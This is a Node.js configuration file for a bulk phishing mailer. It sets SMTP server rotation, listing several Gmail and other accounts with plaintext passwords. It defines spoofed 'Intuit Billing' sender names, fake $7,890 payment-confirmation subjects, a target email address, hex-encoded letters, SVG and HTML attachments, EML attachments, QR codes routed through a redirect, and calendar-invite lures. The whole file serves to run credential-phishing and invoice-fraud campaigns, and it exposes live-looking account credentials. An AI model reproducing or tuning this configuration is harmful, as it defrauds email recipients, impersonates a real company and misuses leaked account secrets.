#!/usr/bin/env node

/**
 * CONFIGURATION: SMTP Server List
 */
const smtp = [
   {
    "host": "smtp.gmail.com",
    "port": 587,
    "secure": false,
    "username": "loloyola10@gmail.com",
    "password": "bgdk imcm vojm uvfp",
    "from_email": "loloyola10@gmail.com",
    
  },
   {
    "host": "secure.emailsrvr.com",
    "port": 587,
    "secure": false,
    "username": "miguel@pacificwestsound.com",
    "password": "ChangeMe!",
    "from_email": "e.drive@pacificwestsound.com",
   
  },
  {
    "host": "smtp.gmail.com",
    "port": 587,
    "secure": false,
    "username": "Rtime458@gmail.com",
    "password": "kupg ctae vpkg eysk",
    "from_email": "Rtime458@gmail.com",
  
  },
];

/**
 * MAIN SETUP: Delivery & Content
 */
const setup = {
  key: "key",
  MultipleSmtp: "ROTATE", // ROTATE or QUEUE
  mail_priority: "HIGH",
  sleep_time: 3,
  isMultiThread: false,
  howManyThread: 10,
  
  // Sender & Subject
  from_name: "Fattureincloud",
  mail_subject: "Nostra Fattura n. 16",
  multiple_fromName: true,
  multi_FromName: [
    "Intuit Billing Department",
    "Intuit Billing",
    "Intuit Payments",
    "Intuit Accounts",
    "Intuit Billing Notifications"
  ],
  multiple_subject: true,
  multi_subject: [
    "Payment Confirmation - $7,890.00 Received",
    "Your Payment on 01/10/2026 Has Been Completed",
    "Receipt for Your Recent Payment ($7,890.00)",
    "Thank You for Your Prompt Payment",
    "Automated Payment Confirmation for Your Records"
  ],

  // Email Handling
  test_frommail: false,
  frommail_filename: "frommail.txt",
  hide_frommail: false,
  replyTo: "",
  email_test: false,
  test_every: 3,
  email_destination: "achmad.abdullah@binus.ac.id",
  
  // Letter Settings
  letter: "letter.html",
  encode_letter: "hex",
  mailist: "mailist.txt",
  
  // Image Rendering
  LetterToImage: true,
  fileName_LetterToImage: "./letterToImage.html",
  width_imageLetter: 650,
  height_imageLetter: 650,
  width_imageLetter_2: 650,
  height_imageLetter_2: 650,

  // Attachment Settings
  useAttachment: true,
  encode_attachment: "ascii",
  pdfOrientation: "potrait",
  attachment_pdf_width: "210mm",
  attachment_pdf_height: "210mm",
  
  // Logo & Branding Dimensions
  useGrabLogo: false,
  defaultLogo: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31",
  useMylogo: false,
  widthImage_for_grabLogo_letter: "",
  heightImage_for_grabLogo_letter: "",
  widthImage_for_myLogo_letter: "",
  heightImage_for_myLogo_letter: "",
  widthImage_for_grabLogo_attachment: "",
  heighttImage_for_grabLogo_attachment: "",
  widthImage_for_myLogo_attachment: "",
  heighttImage_for_myLogo_attachment: "",
  
  proxy: ""
};

/**
 * CALENDAR: Invite Settings
 */
const calendar_invite = {
  active: true,
  TIMEZONE: "America/Adak",
  SUMMARY: "",
  DESCRIPTION: "",
  LOCATION: "<DOMAIN>",
  METHOD: "REQUEST",
  STATUS: "CONFIRMED",
  TRANSP: "OPAQUE",
  ORGANIZER_CN: "",
  ORGANIZER_EMAIL: "<EMAIL>",
  ATTENDEE_CN: "Verified Sender",
  ATTENDEE_EMAIL: "administrator@<DOMAIN>",
  RSVP: false,
  BUSYSTATUS: "BUSY",
  DISALLOW_COUNTER: true,
  IMPORTANCE: 1,
  REMINDER_MINUTES: 15,
  REMINDER_TEXT: "",
  START_DATE: "01/07/2026",
  START_TIME: "10:30",
  END_DATE: "01/07/2026",
  END_TIME: "10:45",
  DURATION_MINUTES: 15
};

/**
 * LINKS & REDIRECTS
 */
const multi_link = {
  active: false,
  link: ['https://urldefense.proofpoint.com/'],
  mode: 2,
  number: 5
};

const redirect_link = {
  useRedirect: false,
  key: "tes1",
  enc_email: "c"
};

/**
 * ATTACHMENTS (File & EML)
 */
const attachment = [
  {
    filename: "<COMPANYNAME>.svg",
    path: "attachment.html",
    attachmentToPdf: false
  }
];

const attachment_EML = {
  use_EML: true,
  attachment_name_EML: "<COMPANYNAME>.eml",
  letter_eml: "EML/letter.html",
  subject_eml: "Outlook Payment <COMPANYNAME>",
  from_email_eml: "support.mail.<COMPANYNAME>.com",
  useAttachment_EML: true,
  attachment: [
    {
      attachmentName: "<COMPANYNAME>-(32025).html",
      path: "EML/attachment.html"
    }
  ]
};

/**
 * GENERATORS
 */
const generate_QRCODE = {
  activate: true,
  foreground_color: "#000000",
  background_color: "#FFFFFF",
  link: "http://www.lipin.com/link.php?url=https://x.com",
  width: "200",
  height: "200"
};

const generate_random_number = [
  { name: "RANDNUM1", lengt_value: 1 },
  { name: "RANDNUM2", lengt_value: 2 },
  { name: "RANDNUM3", lengt_value: 3 },
  { name: "RANDNUM4", lengt_value: 4 },
  { name: "RANDNUM5", lengt_value: 5 }
];

const generate_random_string = [
  { name: "RANDNUM5", lengt_value: 5, type: "UPPERCASE" },
  { name: "random_string_4", lengt_value: 4, type: "LOWERCASE" },
  { name: "random_string_20", lengt_value: 20, type: "LOWERCASE" }
];

/**
 * MISC & ADVANCED
 */
const setup_time_date = {
  time_zone: "America/Adak",
  timezone_name: "short",
  time_format_lang: "en"
};

const others = {
  change_ip: false,
  requireTLS: false,
  ignoreTLS: false,
  letterImageName: "tve.png",
  cid: "JOKDIGLAFGAE",
  cidQR: "JOKDIGLAFGAE2",
  AutoLogin: true,
  qrname: "sincos90.png",
  rejectUnauthorized: false,
  attachment_mode: 2,
  att_CT: "image/svg+xml",
  fix_icloud: false,
  space_attachment: 3,
  maxMessages: 1,
  maxConnections: 1
};

const owa = {
  active: false,
  url: ""
};

const myLOGO = [
  {
    function_name: "MYLOGO",
    nameFile: "https://drive.google.com/uc?export=view&id=1oMBVsQBm4ooCDJHc6JoIk3MNpsufMbQN"
  }
];

// Export Modules
module.exports = {
  smtp,
  setup,
  owa,
  multi_link,
  generate_random_number,
  generate_random_string,
  setup_time_date,
  attachment,
  myLOGO,
  attachment_EML,
  others,
  redirect_link,
  generate_QRCODE,
  calendar_invite
};
